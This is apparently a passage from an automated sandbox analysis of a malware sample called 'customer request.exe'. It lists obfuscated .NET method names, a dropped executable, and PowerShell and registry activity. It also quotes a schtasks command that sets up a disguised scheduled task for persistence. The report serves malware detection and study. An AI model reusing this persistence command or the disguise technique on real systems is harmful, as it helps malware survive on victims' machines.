Source: 0.2.customer request.exe.4c15560.2.raw.unpack, Ec2XMFxfaiHxkRmBmn.cs	High entropy of concatenated method names: 'ToString', 'ImDL1ii5T7', 'oSnLZKBFoP', 'TowLfaS0KN', 'SbUL7J1iTb', 'A16LmWC0kF', 'pc6LRqxr5s', 'qigLbkt3yk', 'ysrLkRxWfo', 'YsgLeIwmhq'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, Tnqhso5aBiL7pIZ1D2n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DRTn1VhWP5', 'KVUnDADir4', 'A9knNXpfBu', 'Vh2nId0mKA', 'PXjnig733N', 'LnDnxmaS3K', 'J2qndT6EGQ'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, A8Yc6SvJOkgCLfdkMW.cs	High entropy of concatenated method names: 'ptLjOVwp1e', 'nCijcBdNTj', 'li7jT7hraB', 'ErojWOb2g9', 'ACyjsV5dpp', 'XhFTX2MRJM', 'NpQTq07fil', 'PoCTB67wwt', 'QfFT8EZ84m', 'CrPTKjNyGb'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.cs	High entropy of concatenated method names: 'oe9VOO3FZP', 'M6lVgmVuKV', 'Rh9Vc16JqN', 'rITV6tGqBN', 'TyrVT9rcB0', 'awuVjZgmQj', 'uXQVWtAc5t', 'Xw2VssPjMs', 'ubZVrNQcsr', 'LLHV35UkIq'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, j67m479qTcYDg5Qguq.cs	High entropy of concatenated method names: 'rWRn67XBtS', 'uHSnTDBg29', 'G0Bnj4jEbH', 'hchnWfXOci', 'JGJnwOykBq', 'zaLnsA5xwV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, mp4sV1dn69wNfhIg3N.cs	High entropy of concatenated method names: 'NRYY3kRiS8', 'AdUYPsDHYP', 'ToString', 'T7iYgihKCL', 'IWrYcvwejs', 'mXXY6wP20F', 'vPDYTHRJ8D', 'AFUYjB6s1p', 'MNsYWKoAo3', 'K9HYsHrlQe'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, UpvgWE5pceq8dtfURFr.cs	High entropy of concatenated method names: 'ToString', 'p4CMJKiTqA', 'n1lMuDJFU7', 'VEsMlJTO7b', 'OxQMvc1Ubp', 'EqRMZt81IB', 'VrTMflldGA', 'h9sM7h72F5', 'eJBNabYn6yMXT5csZeZ', 'VIJoXiYLw5bWIi32E7T'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, ggYHRHqDX7wH0p7mYb.cs	High entropy of concatenated method names: 'J73Y8PFY2T', 'TLrY9ivX8Y', 'Kvo4aMBHjv', 'HTK45ilxZh', 'NGTY1fSZZ3', 'nZbYDpQGqk', 'OqoYNRT7Pl', 'wpAYIQtmGM', 'x8BYi5Ms0i', 'zXsYxaqTxj'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, TfOtqUbyxqV9FU2AH5.cs	High entropy of concatenated method names: 'eIDWgaj1M6', 's77W6XeIoS', 'eIpWjjRaZ2', 'acXj9hQliE', 'Lqfjz0WZ6s', 'MaSWaBNtRg', 'K71W5E7v3d', 'HGOWpjuXas', 'XEvWVeRDEu', 'mZKWH2cUUf'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, IcyCVre0gh9TpvYKf1.cs	High entropy of concatenated method names: 'MNeWCSbEEL', 'NK2Wtklbot', 'etZWSBf0h0', 'dkcWhCRXrC', 'ShJWooJn1n', 'mXdWEDVOF5', 'grFWGfVeWZ', 'YIvWJBJGeI', 'VVCWua1HIn', 'i09WlonLll'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, qMAX89556eugk2HNcXE.cs	High entropy of concatenated method names: 'oMan9LWHj3', 'Gk5nzkplLX', 'fLVMa6cV2R', 'pdnM5CbMGg', 'ObmMpocVdS', 'oMGMV7YRp8', 'zMOMHyrDQW', 'TyJMOeA9nh', 'Y5jMgY0R5G', 'WoqMc9VnIC'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, YE2KE66fLmJbymeiDC.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z5fpKX4veK', 'JFHp9GXqxf', 'RnQpzq6MxA', 'faLVarnmO4', 'HgMV5EIeH7', 'OVeVprlu1X', 'R3wVV1hNnT', 'KyjmATyjVy5AIUHxCJe'
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, MVyPJH5HJaOE2TxbUjq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NbqUwGSeEr', 'KNMUnq22sQ', 'uJoUMp0nDw', 'rhsUU1CKAj', 'llYUym3vpO', 'DIbUAq9Mdl', 'KClUFsDPiE'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, Ptwf96BE9v7EsISXRu.cs	High entropy of concatenated method names: 'DT5w2QTUt2', 'vmQwYY2fJM', 'Fn1wwYGkrp', 'WfmwMhVhRF', 'aggwy1A4JT', 'dkOwFK0eO3', 'Dispose', 'gbT4glsV2m', 'iQn4ct3qCB', 'ObV46D4KMW'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, gkL6jmNysptghdYcpQ.cs	High entropy of concatenated method names: 'WT70JO8d87', 'OeM0uNrdU4', 'n0O0v1kQWM', 'fNV0ZjLlQu', 'P9V07KIiLP', 'Ix90mRKsqL', 'CRv0bVT2Ya', 'meg0kopdKR', 'vIy0Q2emXi', 'hiH01IZE5v'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, efgmRCKKu8Y2Q97foO.cs	High entropy of concatenated method names: 'lsWwv5l76I', 'OHCwZouhQj', 'OtDwfNLBMB', 'lrew77UQ3i', 'YhcwmigoqM', 'wyKwRnaenT', 'K7twbqfLfd', 'A2VwkAEIoC', 'NiGwe8Sy3g', 'lFXwQ3mQ3d'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, AGdSZhHM1AGYJCpOk9.cs	High entropy of concatenated method names: 'b3H5WxaQCH', 'pgI5sNh8Um', 'F3e53BbehX', 'Jf95PxeXfK', 'h3U52Vqh8Y', 'g6S5LJOkgC', 'd5RL95mYMnjjuBe4Rj', 'cckOkJPoExnUEyB30h', 'J8Y55u7Hl4', 'JDU5Vk6F0P'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, MXfKbGljepPOW63UVq.cs	High entropy of concatenated method names: 'Dl8Tol0IJ8', 'j4LTGm2bkw', 'yMU6fVLAfv', 'EJs67tShQs', 'bnA6mZUVNP', 'z4u6RyNidB', 'zs26bahn8k', 'Wfq6kFvfCK', 'h3Q6erch1b', 'JUQ6QolMBm'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, hMaaplu3eBbehXmf9x.cs	High entropy of concatenated method names: 'r8O6hxoxip', 'AO16EVv3QZ', 'LrM6Ji9VuS', 'tx16uxOsJq', 'XlF62Cj3oO', 'KMp6LykNBx', 'u8C6YMSvTL', 'MRX64HioBa', 'HTE6wIg0yy', 'oi26nuUIf7'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, pwqggszUXKQrHygH4t.cs	High entropy of concatenated method names: 'LS5nEoOcHd', 'c9AnJeSxNb', 'vGknu7p0mF', 'a1Wnvdl27U', 'TJRnZwrCDN', 'CX2n7smJ5i', 'TnhnmsG4kq', 'URxnFx4CJT', 'a8onCsgY8b', 'MI4ntd4iaE'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, exaQCHJYgINh8UmdbN.cs	High entropy of concatenated method names: 'M2ecI2gMWG', 'clgcimHOZI', 'BsAcxn0vOE', 'TZjcdwQ6xN', 'F9EcX0jiOv', 'I6wcqDe6TS', 'uGjcBq5eQU', 'L5kc8HnPgG', 'Bc6cKT2mmN', 't44c9TLQh1'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, BdwHJypWnaQtGhd35f.cs	High entropy of concatenated method names: 'RZ6Sr8aGS', 'sbghegMGF', 'KyKEpC6Vf', 'G4sG4lqAV', 'jcHurZWjO', 'QBYlnX5OH', 'lNqbd5M8oNICu2qGva', 'npHieFCnSlimZ5OPIt', 'iJo4MQHV4', 'R9PnygSTr'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, YIi2h6cHyIdwL6sDQo.cs	High entropy of concatenated method names: 'Dispose', 'G7E5KsISXR', 'r7gpZlv6aB', 'Wx7qtMyhU7', 'E6s59YTDan', 'qVN5zrr6dW', 'ProcessDialogKey', 'fuOpafgmRC', 'Xu8p5Y2Q97', 'HoOppW67m4'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, Ec2XMFxfaiHxkRmBmn.cs	High entropy of concatenated method names: 'ToString', 'ImDL1ii5T7', 'oSnLZKBFoP', 'TowLfaS0KN', 'SbUL7J1iTb', 'A16LmWC0kF', 'pc6LRqxr5s', 'qigLbkt3yk', 'ysrLkRxWfo', 'YsgLeIwmhq'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, Tnqhso5aBiL7pIZ1D2n.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DRTn1VhWP5', 'KVUnDADir4', 'A9knNXpfBu', 'Vh2nId0mKA', 'PXjnig733N', 'LnDnxmaS3K', 'J2qndT6EGQ'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, A8Yc6SvJOkgCLfdkMW.cs	High entropy of concatenated method names: 'ptLjOVwp1e', 'nCijcBdNTj', 'li7jT7hraB', 'ErojWOb2g9', 'ACyjsV5dpp', 'XhFTX2MRJM', 'NpQTq07fil', 'PoCTB67wwt', 'QfFT8EZ84m', 'CrPTKjNyGb'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.cs	High entropy of concatenated method names: 'oe9VOO3FZP', 'M6lVgmVuKV', 'Rh9Vc16JqN', 'rITV6tGqBN', 'TyrVT9rcB0', 'awuVjZgmQj', 'uXQVWtAc5t', 'Xw2VssPjMs', 'ubZVrNQcsr', 'LLHV35UkIq'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, j67m479qTcYDg5Qguq.cs	High entropy of concatenated method names: 'rWRn67XBtS', 'uHSnTDBg29', 'G0Bnj4jEbH', 'hchnWfXOci', 'JGJnwOykBq', 'zaLnsA5xwV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, mp4sV1dn69wNfhIg3N.cs	High entropy of concatenated method names: 'NRYY3kRiS8', 'AdUYPsDHYP', 'ToString', 'T7iYgihKCL', 'IWrYcvwejs', 'mXXY6wP20F', 'vPDYTHRJ8D', 'AFUYjB6s1p', 'MNsYWKoAo3', 'K9HYsHrlQe'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, UpvgWE5pceq8dtfURFr.cs	High entropy of concatenated method names: 'ToString', 'p4CMJKiTqA', 'n1lMuDJFU7', 'VEsMlJTO7b', 'OxQMvc1Ubp', 'EqRMZt81IB', 'VrTMflldGA', 'h9sM7h72F5', 'eJBNabYn6yMXT5csZeZ', 'VIJoXiYLw5bWIi32E7T'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, ggYHRHqDX7wH0p7mYb.cs	High entropy of concatenated method names: 'J73Y8PFY2T', 'TLrY9ivX8Y', 'Kvo4aMBHjv', 'HTK45ilxZh', 'NGTY1fSZZ3', 'nZbYDpQGqk', 'OqoYNRT7Pl', 'wpAYIQtmGM', 'x8BYi5Ms0i', 'zXsYxaqTxj'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, TfOtqUbyxqV9FU2AH5.cs	High entropy of concatenated method names: 'eIDWgaj1M6', 's77W6XeIoS', 'eIpWjjRaZ2', 'acXj9hQliE', 'Lqfjz0WZ6s', 'MaSWaBNtRg', 'K71W5E7v3d', 'HGOWpjuXas', 'XEvWVeRDEu', 'mZKWH2cUUf'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, IcyCVre0gh9TpvYKf1.cs	High entropy of concatenated method names: 'MNeWCSbEEL', 'NK2Wtklbot', 'etZWSBf0h0', 'dkcWhCRXrC', 'ShJWooJn1n', 'mXdWEDVOF5', 'grFWGfVeWZ', 'YIvWJBJGeI', 'VVCWua1HIn', 'i09WlonLll'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, qMAX89556eugk2HNcXE.cs	High entropy of concatenated method names: 'oMan9LWHj3', 'Gk5nzkplLX', 'fLVMa6cV2R', 'pdnM5CbMGg', 'ObmMpocVdS', 'oMGMV7YRp8', 'zMOMHyrDQW', 'TyJMOeA9nh', 'Y5jMgY0R5G', 'WoqMc9VnIC'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, YE2KE66fLmJbymeiDC.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z5fpKX4veK', 'JFHp9GXqxf', 'RnQpzq6MxA', 'faLVarnmO4', 'HgMV5EIeH7', 'OVeVprlu1X', 'R3wVV1hNnT', 'KyjmATyjVy5AIUHxCJe'
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, MVyPJH5HJaOE2TxbUjq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NbqUwGSeEr', 'KNMUnq22sQ', 'uJoUMp0nDw', 'rhsUU1CKAj', 'llYUym3vpO', 'DIbUAq9Mdl', 'KClUFsDPiE'

Source: C:\Users\user\Desktop\customer request.exe

File created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\customer request.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\customer request.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
